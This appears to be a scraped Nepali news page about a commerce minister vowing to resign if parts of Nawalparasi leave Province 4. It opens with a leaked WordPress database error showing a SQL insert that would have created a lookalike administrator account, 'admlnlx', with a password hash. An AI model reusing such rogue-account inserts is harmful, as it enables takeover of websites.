WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvgEK/iJv5SGjqMRtadM/.IVa7Nq1H/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 07:59:07', '', 'admlnlx', 'admlnlx')
पोखरा,मंसिर १७-
बाणिज्य मन्त्री रोमी गौचन थकालीले नवलपरासीको सुस्ता र बर्दघाटलाई प्रदेश नम्बर चारबाट अलग गरिए पदबाट राजीनामा दिने उद्घोष गरेका छन् ।पोखरामा आयोजित आर्चरी खेल प्रतियोगिताको उदघाटन कार्यक्रमलाइ सम्बोधन गर्दै नेपाली कांग्रेसका नेतासमेत रहेका मन्त्री थकालीले चार नम्बर प्रदेशमा रहेका ती क्षेत्र अर्को प्रदेशमा गाभ्न नदिने प्रष्ट पारे ।
मन्त्री थकालीले जनताको चाहना, इच्छा बिना राजनीति गर्नेहरु कहिल्यै नटिक्ने ठोकुवा गरे । राजनीति जनताको चाहना, जनताको इच्छा र जनताकै भरोसामा चल्नुपर्ने र आफू पनि त्यहि सिद्धान्त अनुसार चलेकाले मन्त्रीसम्म बन्न पुगको जिकिर गरे ।
उनले कर्मचारी कहिल्यै पार्टीको नहुने भन्दै उनले सोही सोंचका कारण आफूले मन्त्री हुने वित्तिकै कर्मचारी फेरबदल नगरेको स्पष्ट पारे ।
मुस्ताङका मार्फा थकालीहरुको बाक्लो उपस्थिति रहेको कार्यक्रमलाई सम्बोधन गर्दै उनले अब मार्फामा फर्केर आलु उत्पादनमा लाग्न आग्रह गर्दै त्यसको बेच्ने काम आफूले गर्ने प्रतिबद्धता जनाए । आलुको राम्रो सम्भावना भएकाले बाटो निर्माण गरेर बजारीकरणमा सघाउने उनको आश्वासन थियो ।